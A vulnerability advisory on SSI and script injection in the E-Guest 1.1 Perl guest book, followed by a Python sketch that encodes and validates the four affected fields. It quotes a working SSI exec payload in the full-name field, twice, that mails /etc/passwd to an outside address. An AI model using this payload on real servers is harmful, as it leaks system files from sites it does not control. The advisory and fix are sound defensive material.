[Original text] Cross-site scripting (XSS) vulnerability in E-Guest_sign.pl in E-Guest 1.1 allows remote attackers to inject arbitrary SSI directives, web script, and HTML via the (1) full name, (2) email, (3) homepage, and (4) location parameters. NOTE: this issue might overlap CVE-2005-1605.
E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.
E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, a guest book entry can carry server-side include (SSI) directives, which could allow a remote user to execute commands on the local host.
Full Name: HI<!--#exec cmd="/bin/mail email@example.com < /etc/passwd"-->
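
The missing control is output encoding of the four fields before they are written into the guest book page. The following is an added example, not E-Guest's own code (E-Guest is a Perl script; this sketch is in Python). The function names, field keys and length limits are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit

# The four fields named in the advisory; keys and length limits are assumptions.
FIELD_LIMITS = {"full_name": 80, "email": 254, "homepage": 200, "location": 80}
EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def contains_ssi(value):
    """True if the text carries the start of an SSI directive (for auditing stored entries)."""
    return "<!--#" in value


def encode_field(name, value):
    """Validate one guest book field and return text safe to write into the page."""
    value = CONTROL_CHARS.sub(" ", value).strip()[: FIELD_LIMITS[name]]
    if name == "email" and value and not EMAIL.fullmatch(value):
        value = ""
    if name == "homepage" and value:
        try:
            parts = urlsplit(value)
            ok = parts.scheme in ("http", "https") and bool(parts.netloc)
        except ValueError:  # malformed URL, e.g. an unterminated IPv6 literal
            ok = False
        if not ok:
            value = ""
    # With '<', '>', '&' and quotes encoded, neither the SSI parser nor the
    # browser sees a directive or a tag in the stored text.
    return html.escape(value, quote=True)


def encode_entry(entry):
    """Encode every known field; keys outside FIELD_LIMITS are dropped."""
    return {name: encode_field(name, entry.get(name, "")) for name in FIELD_LIMITS}


if __name__ == "__main__":
    # Constructed entry; the full name is the value shown in the advisory.
    sample = {
        "full_name": 'HI<!--#exec cmd="/bin/mail email@example.com < /etc/passwd"-->',
        "email": "visitor@example.com",
        "homepage": "https://example.org/",
        "location": "Somewhere",
    }
    print("raw entry contains SSI:", contains_ssi(sample["full_name"]))
    for field, text in encode_entry(sample).items():
        print(field, "=>", text)
```

Where the guest book does not itself need server-side includes, turning off SSI processing (or at least exec) for the generated page removes the command-execution path even if an entry is stored unencoded.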